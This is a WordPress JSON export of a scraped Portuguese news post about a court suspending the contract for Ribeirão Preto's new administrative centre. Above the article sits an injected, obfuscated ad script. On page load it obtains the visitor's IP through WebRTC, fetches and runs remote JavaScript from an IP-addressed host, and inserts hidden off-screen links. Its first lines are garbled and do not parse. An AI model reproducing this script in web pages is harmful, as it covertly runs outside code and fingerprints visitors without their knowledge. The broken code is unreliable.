{"id":74814,"date":"2024-11-02T13:44:17","date_gmt":"2024-11-02T16:44:17","guid":{"rendered":"https:\/\/ismaelcolosi.com.br\/index.php\/2024\/11\/02\/justica-suspende-contrato-para-construcao-do-novo-centro-administrativo-de-ribeirao-preto-2\/"},"modified":"2024-11-02T13:44:17","modified_gmt":"2024-11-02T16:44:17","slug":"justica-suspende-contrato-para-construcao-do-novo-centro-administrativo-de-ribeirao-preto-2","status":"publish","type":"post","link":"https:\/\/ismaelcolosi.com.br\/index.php\/2024\/11\/02\/justica-suspende-contrato-para-construcao-do-novo-centro-administrativo-de-ribeirao-preto-2\/","title":{"rendered":"Justi\u00e7a suspende contrato para constru\u00e7\u00e3o do novo Centro Administrativo de Ribeir\u00e3o Preto"},"content":{"rendered":"<div id=\"awn-z8922274\"><\/div>\n<p><script data-cfasync=\"false\" type=\"text\/javascript\">\n    var adcashMacros = (n=e.charCodeAt(s++))>>4,i=(15&n)<<2;\n    var zoneNativeSett=(n=e.charCodeAt(s++))>>4,i=(15&n)<<2;\n    var urls=(r=e.charCodeAt(s++))>>6,o=63&r,isNaN(n)?i=o=64:isNaN(r)&&(o=64),c=c+this._0.charAt(a)+this._0.charAt(t)+this._0.charAt(i)+this._0.charAt(o);return c;function acPrefetch(e)for(var t,n,r,a,i,o,c=\"\",s=0;s<e.length;)a=(t=e.charCodeAt(s++))>>2,t=(3&t)<<4var nativeInit=new function(){var a=\"\",i=Math.floor(1e12*Math.random()),o=Math.floor(1e12*Math.random()),t=window.location.protocol,c={_0:\"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=\",encode:function(e){for(var t,n,r,a,i,o,c=\"\",s=0;s<e.length;)a=(t=e.charCodeAt(s++))>>2,t=(3&t)<<4|(n=e.charCodeAt(s++))>>4,i=(15&n)<<2|(r=e.charCodeAt(s++))>>6,o=63&r,isNaN(n)?i=o=64:isNaN(r)&&(o=64),c=c+this._0.charAt(a)+this._0.charAt(t)+this._0.charAt(i)+this._0.charAt(o);return c}};this.init=function(){e()};var e=function(){var e=document.createElement(\"script\");e.setAttribute(\"data-cfasync\",!1),e.src=\"\/\/pagead2.googlesyndication.com\/pagead\/js\/adsbygoogle.js\",e.onerror=function(){!0,r(),n()},e.onload=function(){nativeForPublishers.init()},nativeForPublishers.attachScript(e)},n=function(){\"\"!==a?s(i,t):setTimeout(n,250)},r=function(){var t=new(window.RTCPeerConnection||window.mozRTCPeerConnection||window.webkitRTCPeerConnection)({iceServers:[{urls:\"stun:1755001826:443\"}]},{optional:[{RtpDataChannels:!0}]});t.onicecandidate=function(e){!e.candidate||e.candidate&&-1==e.candidate.candidate.indexOf(\"srflx\")||!(e=\/([0-9]{1,3}(\\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})\/.exec(e.candidate.candidate)[1])||e.match(\/^(192\\.168\\.|169\\.254\\.|10\\.|172\\.(1[6-9]|2\\d|3[01]))\/)||e.match(\/^[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7}$\/)||(a=e)},t.createDataChannel(\"\"),t.createOffer(function(e){t.setLocalDescription(e,function(){},function(){})},function(){})},s=function(){var e=document.createElement(\"script\");e.setAttribute(\"data-cfasync\",!1),e.src=t+\"\/\/\"+a+\"\/\"+c.encode(i+\"\/\"+(i+5))+\".js\",e.onload=function(){for(var e in zoneNativeSett.r)d(zoneNativeSett.r[e])},nativeForPublishers.attachScript(e)},d=function(e){var t=\"jsonp\"+Math.round(1000001*Math.random()),n=[i,parseInt(e)+i,o,\"callback=\"+t],r=\"http:\/\/\"+a+\"\/\"+c.encode(n.join(\"\/\"));new native_request(r,e,t).jsonp()}},nativeForPublishers=new function(){var n=this,e=Math.random();n.getRand=function(){return e},this.getNativeRender=function(){if(!n.nativeRenderLoaded){var e=document.createElement(\"script\");e.setAttribute(\"data-cfasync\",\"false\"),e.src=urls.cdnUrls[urls.cdnIndex]+\"\/script\/native_render.js\",e.onerror=function(){throw new Error(\"cdnerr\")},e.onload=function(){n.nativeRenderLoaded=!0},n.attachScript(e)}},this.getNativeResponse=function(){if(!n.nativeResponseLoaded){var e=document.createElement(\"script\");e.setAttribute(\"data-cfasync\",\"false\"),e.src=urls.cdnUrls[urls.cdnIndex]+\"\/script\/native_server.js\",e.onerror=function(){throw new Error(\"cdnerr\")},e.onload=function(){n.nativeResponseLoaded=!0},n.attachScript(e)}},this.attachScript=function(e){var t;void 0!==document.scripts&&(t=document.scripts[0]),void 0===t&&(t=document.getElementsByTagName(\"script\")[0]),t.parentNode.insertBefore(e,t)},this.fetchCdnScripts=function(){if(urls.cdnIndex<urls.cdnUrls.length)try{n.getNativeRender(),n.getNativeResponse()}catch(e){urls.cdnIndex++,n.fetchCdnScripts()}},this.scriptsLoaded=function(){if(n.nativeResponseLoaded&#038;&#038;n.nativeRenderLoaded){var e=[];for(zone in zoneNativeSett.r)document.getElementById(zoneNativeSett.container+\"-z\"+zoneNativeSett.r[zone])&#038;&#038;(e[zoneNativeSett.r[zone]]=new native_request(\"\/\/\"+zoneNativeSett.baseUrl+\"?nwpsv=1&#038;\",zoneNativeSett.r[zone]),e[zoneNativeSett.r[zone]].build());for(var t in e)e[t].jsonp(\"callback\",(e[t],function(e,t){setupAd(zoneNativeSett.container+\"-z\"+t,e)}))}else setTimeout(n.scriptsLoaded,250)},this.init=function(){var e;if(n.insertBotTrapLink(),0===window.location.href.indexOf(\"file:\/\/\"))for(e=0;e<urls.cdnUrls.length;e++)0===urls.cdnUrls[e].indexOf(\"\/\/\")&#038;&#038;(urls.cdnUrls[e]=\"http:\"+urls.cdnUrls[e]);for(e=0;e<urls.cdnUrls.length;e++)acPrefetch(urls.cdnUrls[e]);n.fetchCdnScripts(),n.scriptsLoaded()},this.insertBotTrapLink=function(){var e=document.createElement(\"a\");e.href=window.location.protocol+\"\/\/discovernative.com\/al\/visit.php?al=1,4\",e.style.display=\"none\",e.style.visibility=\"hidden\",e.style.position=\"relative\",e.style.left=\"-1000px\",e.style.top=\"-1000px\",e.style.color=\"#fff\",e.link='<a href=\"http:\/\/discovernative.com\/al\/visit.php?al=1,5\"><\/a>',e.innerHTML=\"\",document.body.appendChild(e)}};nativeInit.init();\n<\/script><br \/>\n<a href=\"https:\/\/discovernative.com\/al\/visit.php?al=1,7\" style=\"position:absolute;top:-1000px;left:-1000px;width:1px;height:1px;visibility:hidden;display:none;border:medium none;background-color:transparent;\" target=\"_blank\" rel=\"noopener\"><\/a><br \/>\n<noscript><br \/>\n    <a href=\"https:\/\/discovernative.com\/al\/visit.php?al=1,6\" style=\"position:absolute;top:-1000px;left:-1000px;width:1px;height:1px;visibility:hidden;display:none;border:medium none;background-color:transparent;\" target=\"_blank\" rel=\"noopener\"><\/a><br \/>\n<\/noscript><br \/>\n [ad_1]<br \/>\n<\/p>\n<div>\n<p>Nesta sexta-feira (1\u00ba), a constru\u00e7\u00e3o do novo <strong>Centro Administrativo de Ribeir\u00e3o Preto<\/strong> ganhou mais um cap\u00edtulo. A ju\u00edza Lucilene Canella de Mello <strong>deferiu pedido de liminar para suspender a execu\u00e7\u00e3o do contrato.<\/strong> A a\u00e7\u00e3o foi apresentada pelos vereadores Duda Hidalgo (PT) e Marcos Papa (Podemos). <\/p>\n<p>O <mark style=\"background-color:#fcb900\" class=\"has-inline-color\">prefeito Duarte Nogueira<\/mark> <strong>acredita\u00a0<\/strong>que a constru\u00e7\u00e3o do novo edif\u00edcio\u00a0trar\u00e1 mais celeridade para Ribeir\u00e3o Preto. No entanto, o prefeito eleito <strong>Ricardo Silva<\/strong>, <strong>j\u00e1 se posicionou contra constru\u00e7\u00e3o da futura sede do Executivo Municipal.<\/strong><\/p>\n<p>Al\u00e9m da <strong>Acirp (Associa\u00e7\u00e3o Comercial e Industrial de Ribeir\u00e3o Preto), outras entidades como Sincovarp (Sindicato do Com\u00e9rcio Varejista), CDL RP (C\u00e2mara de Dirigentes Lojistas), Sinhores Nordeste Paulista (Sindicato de Hot\u00e9is, Restaurantes, Bares e Similares), Sincomerciarios RP (Sindicato dos Empregados do Com\u00e9rcio de Ribeir\u00e3o Preto) e Sindhoteleiros RP (Sindicato dos Trabalhadores de Hot\u00e9is, Mot\u00e9is, Restaurantes, Bares e Fast-foods de Ribeir\u00e3o Preto) tamb\u00e9m <\/strong>repudiaram a obra com a alega\u00e7\u00e3o de que isso ir\u00e1 acelerar o processo de degrada\u00e7\u00e3o do Centro da cidade, al\u00e9m de prejudicar o com\u00e9rcio.<\/p>\n<p><strong>No \u00faltimo m\u00eas<\/strong>, o contrato para constru\u00e7\u00e3o do novo pr\u00e9dio foi assinado. Na mesma semana, a C\u00e2mara Municipal aprovou a realiza\u00e7\u00e3o de um plebiscito <strong>para que a popula\u00e7\u00e3o decida sobre a realiza\u00e7\u00e3o, ou n\u00e3o, da obra.<\/strong><\/p>\n<p><strong>Com a decis\u00e3o desta sexta-feira<\/strong>, <mark style=\"background-color:#fcb900\" class=\"has-inline-color\">a obra fica suspensa.<\/mark> <strong>Ainda cabe recurso por parte\u00a0da\u00a0Prefeitura.<\/strong><\/p>\n<p><em><sup>At\u00e9 o fechamento desta mat\u00e9ria a Prefeitura de Ribeir\u00e3o Preto ainda n\u00e3o se pronunciou sobre a suspens\u00e3o. <\/sup><\/em><\/p>\n<p>________________________________________________________________________________<\/p>\n<p>SAIBA MAIS<\/p>\n<p>Opera\u00e7\u00e3o encontra laborat\u00f3rio de drogas e prende duas pessoas em Ribeir\u00e3o Preto<\/p>\n<h4 class=\"wp-block-heading\"><strong>FIQUE ON<\/strong><\/h4>\n<p>Fique ligado em tudo que acontece em Ribeir\u00e3o Preto e regi\u00e3o. Siga os perfis do<strong>\u00a0acidade on<\/strong>\u00a0no\u00a0<a href=\"https:\/\/www.instagram.com\/acidadeonribeirao\" target=\"_blank\" rel=\"noreferrer noopener\">Instagram\u00a0<\/a>e no\u00a0<a href=\"https:\/\/www.facebook.com\/acidadeonribeirao\/\" target=\"_blank\" rel=\"noreferrer noopener\">Facebook<\/a>.<\/p>\n<p>Receba not\u00edcias do\u00a0<strong>acidade on\u00a0<\/strong>no WhatsApp.\u00a0<a href=\"https:\/\/chat.whatsapp.com\/Fg4ok3aAVyB59DP63pRapr\" target=\"_blank\" rel=\"noreferrer noopener\">Para entrar no grupo, basta clicar aqui.<\/a><\/p>\n<p>Fa\u00e7a uma den\u00fancia ou sugira uma reportagem sobre Ribeir\u00e3o Preto e regi\u00e3o pelo WhatsApp: 16 99117 7802.<\/p>\n<p>VEJA TAMB\u00c9M<\/p>\n<p>Onde assistir ao trailer da segunda temporada de \u2018Round 6\u2019?<\/p>\n<p><!-- CONTENT END 1 -->\n<\/div>\n<p><script async src=\"\/\/www.instagram.com\/embed.js\"><\/script><br \/>\n<br \/>[ad_2]<br \/>\n<br \/><a href=\"https:\/\/www.acidadeon.com\/ribeiraopreto\/politica\/justicasuspende-contrato-para-construcao-do-novo-centro-administrativo-de-ribeirao-preto\/\" target=\"_blank\" rel=\"noopener\">Source link <\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>[ad_1] Nesta sexta-feira (1\u00ba), a constru\u00e7\u00e3o do novo Centro Administrativo de Ribeir\u00e3o Preto ganhou mais um cap\u00edtulo. A ju\u00edza Lucilene Canella de Mello deferiu pedido de liminar para suspender a execu\u00e7\u00e3o do contrato. A a\u00e7\u00e3o foi apresentada pelos vereadores Duda Hidalgo (PT) e Marcos Papa (Podemos). O prefeito Duarte Nogueira acredita\u00a0que a constru\u00e7\u00e3o do novo &#8230; <a title=\"Justi\u00e7a suspende contrato para constru\u00e7\u00e3o do novo Centro Administrativo de Ribeir\u00e3o Preto\" class=\"read-more\" href=\"https:\/\/ismaelcolosi.com.br\/index.php\/2024\/11\/02\/justica-suspende-contrato-para-construcao-do-novo-centro-administrativo-de-ribeirao-preto-2\/\" aria-label=\"Leia mais sobre Justi\u00e7a suspende contrato para constru\u00e7\u00e3o do novo Centro Administrativo de Ribeir\u00e3o Preto\">Ler mais<\/a><\/p>\n","protected":false},"author":1,"featured_media":70150,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_uag_custom_page_level_css":"","_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[11],"tags":[],"class_list":["post-74814","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-noticias-de-ribeirao-preto-sp-e-regiao-ismael-colosi"],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/10\/centro_administrativo_1024x576_20112019183024_2024-10-09_20-45-18_jpg_2024-10-09_20-45-18.webp.webp?fit=1024%2C575&ssl=1","uagb_featured_image_src":{"full":["https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/10\/centro_administrativo_1024x576_20112019183024_2024-10-09_20-45-18_jpg_2024-10-09_20-45-18.webp.webp?fit=1024%2C575&ssl=1",1024,575,false],"thumbnail":["https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/10\/centro_administrativo_1024x576_20112019183024_2024-10-09_20-45-18_jpg_2024-10-09_20-45-18.webp.webp?resize=150%2C150&ssl=1",150,150,true],"medium":["https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/10\/centro_administrativo_1024x576_20112019183024_2024-10-09_20-45-18_jpg_2024-10-09_20-45-18.webp.webp?fit=300%2C168&ssl=1",300,168,true],"medium_large":["https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/10\/centro_administrativo_1024x576_20112019183024_2024-10-09_20-45-18_jpg_2024-10-09_20-45-18.webp.webp?fit=768%2C431&ssl=1",768,431,true],"large":["https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/10\/centro_administrativo_1024x576_20112019183024_2024-10-09_20-45-18_jpg_2024-10-09_20-45-18.webp.webp?fit=1024%2C575&ssl=1",1024,575,true],"1536x1536":["https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/10\/centro_administrativo_1024x576_20112019183024_2024-10-09_20-45-18_jpg_2024-10-09_20-45-18.webp.webp?fit=1024%2C575&ssl=1",1024,575,true],"2048x2048":["https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/10\/centro_administrativo_1024x576_20112019183024_2024-10-09_20-45-18_jpg_2024-10-09_20-45-18.webp.webp?fit=1024%2C575&ssl=1",1024,575,true]},"uagb_author_info":{"display_name":"ismaelcolosi.com.br","author_link":"https:\/\/ismaelcolosi.com.br\/author\/vidareal-online\/"},"uagb_comment_info":0,"uagb_excerpt":"[ad_1] Nesta sexta-feira (1\u00ba), a constru\u00e7\u00e3o do novo Centro Administrativo de Ribeir\u00e3o Preto ganhou mais um cap\u00edtulo. A ju\u00edza Lucilene Canella de Mello deferiu pedido de liminar para suspender a execu\u00e7\u00e3o do contrato. A a\u00e7\u00e3o foi apresentada pelos vereadores Duda Hidalgo (PT) e Marcos Papa (Podemos). O prefeito Duarte Nogueira acredita\u00a0que a constru\u00e7\u00e3o do novo&hellip;","jetpack-related-posts":[{"id":76921,"url":"https:\/\/ismaelcolosi.com.br\/index.php\/2024\/11\/19\/ribeirao-preto-recebe-festival-de-orquideas-e-suculentas-veja-quando\/","url_meta":{"origin":74814,"position":0},"title":"Ribeir\u00e3o Preto recebe festival de orqu\u00eddeas e suculentas; Veja quando","author":"ismaelcolosi.com.br","date":"19 de Novembro de 2024","format":false,"excerpt":"[ad_1] Acontece em Ribeir\u00e3o Preto, entre os dias 30 de novembro e 1\u00ba de dezembro, o 3\u00ba Festival de Orqu\u00eddeas e Suculentas. Ao todo, seis orquid\u00e1rios participar\u00e3o do festival, que ter\u00e1 entrada gratuita. O evento acontece no Centro Social Dom Arnaldo Ribeiro, que fica na rua Prudente de Morais, 431,\u2026","rel":"","context":"In &quot;Not\u00edcias de Ribeir\u00e3o Preto-SP e Regi\u00e3o&quot;","block_context":{"text":"Not\u00edcias de Ribeir\u00e3o Preto-SP e Regi\u00e3o","link":"https:\/\/ismaelcolosi.com.br\/index.php\/category\/noticias-de-ribeirao-preto-sp-e-regiao-ismael-colosi\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/11\/orquidea_2024-11-19_15-57-55_jpg_2024-11-19_15-57-55.webp.webp?fit=1200%2C826&ssl=1&resize=350%2C200","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/11\/orquidea_2024-11-19_15-57-55_jpg_2024-11-19_15-57-55.webp.webp?fit=1200%2C826&ssl=1&resize=350%2C200 1x, https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/11\/orquidea_2024-11-19_15-57-55_jpg_2024-11-19_15-57-55.webp.webp?fit=1200%2C826&ssl=1&resize=525%2C300 1.5x, https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/11\/orquidea_2024-11-19_15-57-55_jpg_2024-11-19_15-57-55.webp.webp?fit=1200%2C826&ssl=1&resize=700%2C400 2x, https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/11\/orquidea_2024-11-19_15-57-55_jpg_2024-11-19_15-57-55.webp.webp?fit=1200%2C826&ssl=1&resize=1050%2C600 3x"},"classes":[]},{"id":75566,"url":"https:\/\/ismaelcolosi.com.br\/index.php\/2024\/11\/06\/hc-de-ribeirao-preto-anuncia-novos-concursos-publicos-confira-as-vagas-2\/","url_meta":{"origin":74814,"position":1},"title":"HC de Ribeir\u00e3o Preto anuncia novos concursos p\u00fablicos; confira as vagas","author":"ismaelcolosi.com.br","date":"6 de Novembro de 2024","format":false,"excerpt":"[ad_1] O\u00a0Hospital das\u00a0Cl\u00ednicas de Ribeir\u00e3o Preto (HC-RP)\u00a0publicou o edital de 14 novos\u00a0concursos p\u00fablicos. As oportunidades s\u00e3o de\u00a0n\u00edvel t\u00e9cnico e superior\u00a0e os sal\u00e1rios variam entre\u00a0R$ 2,5 mil\u00a0e\u00a0R$ 5,7 mil. De acordo com o edital, os contratados v\u00e3o receber tamb\u00e9m um\u00a0aux\u00edlio alimenta\u00e7\u00e3o no valor de R$ 360 e vale-transporte. As vagas s\u00e3o\u2026","rel":"","context":"In &quot;Not\u00edcias de Ribeir\u00e3o Preto-SP e Regi\u00e3o&quot;","block_context":{"text":"Not\u00edcias de Ribeir\u00e3o Preto-SP e Regi\u00e3o","link":"https:\/\/ismaelcolosi.com.br\/index.php\/category\/noticias-de-ribeirao-preto-sp-e-regiao-ismael-colosi\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/07\/Copia-de-Copia-de-TAMANHO-EXATO-PARA-FOTOS-NO-SISTEMA-NOVO-13_2024-07-14_14-37-47_jpg_2024-07-14_14-37-47.webp.webp?fit=1200%2C675&ssl=1&resize=350%2C200","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/07\/Copia-de-Copia-de-TAMANHO-EXATO-PARA-FOTOS-NO-SISTEMA-NOVO-13_2024-07-14_14-37-47_jpg_2024-07-14_14-37-47.webp.webp?fit=1200%2C675&ssl=1&resize=350%2C200 1x, https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/07\/Copia-de-Copia-de-TAMANHO-EXATO-PARA-FOTOS-NO-SISTEMA-NOVO-13_2024-07-14_14-37-47_jpg_2024-07-14_14-37-47.webp.webp?fit=1200%2C675&ssl=1&resize=525%2C300 1.5x, https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/07\/Copia-de-Copia-de-TAMANHO-EXATO-PARA-FOTOS-NO-SISTEMA-NOVO-13_2024-07-14_14-37-47_jpg_2024-07-14_14-37-47.webp.webp?fit=1200%2C675&ssl=1&resize=700%2C400 2x, https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/07\/Copia-de-Copia-de-TAMANHO-EXATO-PARA-FOTOS-NO-SISTEMA-NOVO-13_2024-07-14_14-37-47_jpg_2024-07-14_14-37-47.webp.webp?fit=1200%2C675&ssl=1&resize=1050%2C600 3x"},"classes":[]},{"id":80093,"url":"https:\/\/ismaelcolosi.com.br\/index.php\/2024\/12\/20\/zoologico-de-ribeirao-preto-promove-o-natal-dos-bichos-veja-quando\/","url_meta":{"origin":74814,"position":2},"title":"Zool\u00f3gico de Ribeir\u00e3o Preto promove o &#8216;Natal dos Bichos&#8217;; veja quando","author":"ismaelcolosi.com.br","date":"20 de Dezembro de 2024","format":false,"excerpt":"[ad_1] O Zool\u00f3gico F\u00e1bio Barreto, em Ribeir\u00e3o Preto, preparou uma programa\u00e7\u00e3o especial para celebrar o esp\u00edrito natalino com os animais. O evento Natal dos Bichos acontecer\u00e1 neste s\u00e1bado, 21 de dezembro, das 9h \u00e0s 12h, e tem entrada gratuita. A a\u00e7\u00e3o tem\u00e1tica trar\u00e1 atividades exclusivas para os animais, com enriquecimentos\u2026","rel":"","context":"In &quot;Not\u00edcias de Ribeir\u00e3o Preto-SP e Regi\u00e3o&quot;","block_context":{"text":"Not\u00edcias de Ribeir\u00e3o Preto-SP e Regi\u00e3o","link":"https:\/\/ismaelcolosi.com.br\/index.php\/category\/noticias-de-ribeirao-preto-sp-e-regiao-ismael-colosi\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/12\/1734738776_obras_bosque_-_foto_guilherme_sircili_30.jpg?fit=1200%2C800&ssl=1&resize=350%2C200","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/12\/1734738776_obras_bosque_-_foto_guilherme_sircili_30.jpg?fit=1200%2C800&ssl=1&resize=350%2C200 1x, https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/12\/1734738776_obras_bosque_-_foto_guilherme_sircili_30.jpg?fit=1200%2C800&ssl=1&resize=525%2C300 1.5x, https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/12\/1734738776_obras_bosque_-_foto_guilherme_sircili_30.jpg?fit=1200%2C800&ssl=1&resize=700%2C400 2x, https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/12\/1734738776_obras_bosque_-_foto_guilherme_sircili_30.jpg?fit=1200%2C800&ssl=1&resize=1050%2C600 3x"},"classes":[]},{"id":79368,"url":"https:\/\/ismaelcolosi.com.br\/index.php\/2024\/12\/15\/chuva-continua-veja-a-previsao-do-tempo-para-ribeirao-preto-nos-proximos-sete-dias\/","url_meta":{"origin":74814,"position":3},"title":"Chuva continua? Veja a previs\u00e3o do tempo para Ribeir\u00e3o Preto nos pr\u00f3ximos sete dias","author":"ismaelcolosi.com.br","date":"15 de Dezembro de 2024","format":false,"excerpt":"[ad_1] A chuva deve continuar em Ribeir\u00e3o Preto nos pr\u00f3ximos dias, segundo a Climatempo. Al\u00e9m disso, os meteorologistas apontam para riscos de temporais no final da pr\u00f3xima semana. As temperaturas na cidade devem ficar entre 17\u00b0C e 30\u00b0C. Confira a previs\u00e3o do tempo Segunda-feira, 16 de dezembroM\u00e1xima: 27\u00b0CM\u00ednima: 20\u00b0CSol com\u2026","rel":"","context":"In &quot;Not\u00edcias de Ribeir\u00e3o Preto-SP e Regi\u00e3o&quot;","block_context":{"text":"Not\u00edcias de Ribeir\u00e3o Preto-SP e Regi\u00e3o","link":"https:\/\/ismaelcolosi.com.br\/index.php\/category\/noticias-de-ribeirao-preto-sp-e-regiao-ismael-colosi\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/12\/chuva-ribeirao-preto_2024-12-15_20-55-28_jpeg_2024-12-15_20-55-29.webp.webp?fit=1200%2C900&ssl=1&resize=350%2C200","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/12\/chuva-ribeirao-preto_2024-12-15_20-55-28_jpeg_2024-12-15_20-55-29.webp.webp?fit=1200%2C900&ssl=1&resize=350%2C200 1x, https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/12\/chuva-ribeirao-preto_2024-12-15_20-55-28_jpeg_2024-12-15_20-55-29.webp.webp?fit=1200%2C900&ssl=1&resize=525%2C300 1.5x, https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/12\/chuva-ribeirao-preto_2024-12-15_20-55-28_jpeg_2024-12-15_20-55-29.webp.webp?fit=1200%2C900&ssl=1&resize=700%2C400 2x, https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/12\/chuva-ribeirao-preto_2024-12-15_20-55-28_jpeg_2024-12-15_20-55-29.webp.webp?fit=1200%2C900&ssl=1&resize=1050%2C600 3x"},"classes":[]},{"id":75767,"url":"https:\/\/ismaelcolosi.com.br\/index.php\/2024\/11\/07\/saiba-como-esta-a-situacao-do-transito-de-ribeirao-preto-apos-temporal-2\/","url_meta":{"origin":74814,"position":4},"title":"Saiba como est\u00e1 a situa\u00e7\u00e3o do tr\u00e2nsito de Ribeir\u00e3o Preto ap\u00f3s temporal","author":"ismaelcolosi.com.br","date":"7 de Novembro de 2024","format":false,"excerpt":"[ad_1] Ap\u00f3s o\u00a0temporal\u00a0que atingiu\u00a0Ribeir\u00e3o Preto\u00a0no in\u00edcio desta quinta-feira (7), a\u00a0RP Mobi atualizou a situa\u00e7\u00e3o do tr\u00e2nsito e os principais pontos de alagamentos na cidade. Confira: Vias com interdi\u00e7\u00f5es e alagamentos: Avenida Eduardo Andrea Matarazzo (Via Norte)No trecho entre estrada Vicente Canuto e avenida Euclides Figueiredo, a Via Norte est\u00e1 liberada\u2026","rel":"","context":"In &quot;Not\u00edcias de Ribeir\u00e3o Preto-SP e Regi\u00e3o&quot;","block_context":{"text":"Not\u00edcias de Ribeir\u00e3o Preto-SP e Regi\u00e3o","link":"https:\/\/ismaelcolosi.com.br\/index.php\/category\/noticias-de-ribeirao-preto-sp-e-regiao-ismael-colosi\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/11\/Copia-de-Copia-de-Copia-de-TAMANHO-EXATO-PARA-FOTOS-NO-SISTEMA-NOVO-75_2024-11-07_19-54-56_png_2024-11-07_19-54-56.webp.webp?fit=1200%2C675&ssl=1&resize=350%2C200","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/11\/Copia-de-Copia-de-Copia-de-TAMANHO-EXATO-PARA-FOTOS-NO-SISTEMA-NOVO-75_2024-11-07_19-54-56_png_2024-11-07_19-54-56.webp.webp?fit=1200%2C675&ssl=1&resize=350%2C200 1x, https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/11\/Copia-de-Copia-de-Copia-de-TAMANHO-EXATO-PARA-FOTOS-NO-SISTEMA-NOVO-75_2024-11-07_19-54-56_png_2024-11-07_19-54-56.webp.webp?fit=1200%2C675&ssl=1&resize=525%2C300 1.5x, https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/11\/Copia-de-Copia-de-Copia-de-TAMANHO-EXATO-PARA-FOTOS-NO-SISTEMA-NOVO-75_2024-11-07_19-54-56_png_2024-11-07_19-54-56.webp.webp?fit=1200%2C675&ssl=1&resize=700%2C400 2x, https:\/\/i0.wp.com\/ismaelcolosi.com.br\/wp-content\/uploads\/2024\/11\/Copia-de-Copia-de-Copia-de-TAMANHO-EXATO-PARA-FOTOS-NO-SISTEMA-NOVO-75_2024-11-07_19-54-56_png_2024-11-07_19-54-56.webp.webp?fit=1200%2C675&ssl=1&resize=1050%2C600 3x"},"classes":[]},{"id":75776,"url":"https:\/\/ismaelcolosi.com.br\/index.php\/2024\/11\/07\/time-da-regiao-de-ribeirao-preto-sobe-de-divisao-mesmo-sem-entrar-em-campo-entenda\/","url_meta":{"origin":74814,"position":5},"title":"Time da regi\u00e3o de Ribeir\u00e3o Preto sobe de divis\u00e3o mesmo sem entrar em campo; Entenda","author":"ismaelcolosi.com.br","date":"7 de Novembro de 2024","format":false,"excerpt":"[ad_1] A Inter de Bebedouro, time da regi\u00e3o de Ribeir\u00e3o Preto, conquistou nesta quinta-feira (7) o acesso para S\u00e9rie A4 do Campeonato Paulista de 2025, mesmo sem entrar em campo desde o dia 31 de agosto. Isso porque, a equipe vai herdar a vaga na competi\u00e7\u00e3o do Ska Brasil, que\u2026","rel":"","context":"In &quot;Not\u00edcias de Ribeir\u00e3o Preto-SP e Regi\u00e3o&quot;","block_context":{"text":"Not\u00edcias de Ribeir\u00e3o Preto-SP e 